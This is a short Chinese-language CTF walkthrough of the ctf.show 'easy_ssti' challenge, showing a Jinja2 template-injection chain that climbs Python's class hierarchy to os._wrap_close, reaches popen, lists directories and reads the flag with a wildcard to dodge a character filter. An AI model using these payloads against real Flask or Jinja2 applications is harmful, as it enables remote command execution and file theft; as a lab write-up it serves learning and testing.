https://ctf.show/challenges#easy_ssti-3969
2023愚人杯
有提示app.zip,访问
https://1f660587-5340-4b20-b929-c4549d9a5d4b.challenge.ctf.show/app.zip
得到压缩包,拿到一个py文件
可以看到参数名是name,对参数进行筛选,包含ge或者不包含f
访问
/hello/<name>
下面想办法找到一个function
payload
https://223ff55e-0cee-495b-ac39-ea55e8d6fc2d.challenge.ctf.show/hello/
{{''.__class__.__base__.__subclasses__()}}
其中<class 'os._wrap_close'>就是os对象类
这里可以自己写段代码找找os在第几位
ori_str = """这里面就放网页复制的,篇幅原因我不放进去"""
ori_list = ori_str.split(",")
for index, item in enumerate(ori_list):if "os._wrap_close" in item:print(index)
成功拿到os对象类
如何拿到popen函数?
先获取对象的__init__属性,接着使用__globals__获取函数作用域下方法,里面则包含popen
https://223ff55e-0cee-495b-ac39-ea55e8d6fc2d.challenge.ctf.show/hello/
{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}
下面就可以为所欲为了
- 获取当前文件目录
https://223ff55e-0cee-495b-ac39-ea55e8d6fc2d.challenge.ctf.show/hello/
{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}hello app.py app.zip templates
- 获取上级文件目录
https://223ff55e-0cee-495b-ac39-ea55e8d6fc2d.challenge.ctf.show/hello/
{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cd .. && ls').read()}}# 先cd ..回到上级目录 再用ls读取hello app bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var
发现flag了,读取flag文件,因为屏蔽了f,所有这里使用通配符
https://223ff55e-0cee-495b-ac39-ea55e8d6fc2d.challenge.ctf.show/hello/
{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cd .. && cat *lag').read()}}
)
)
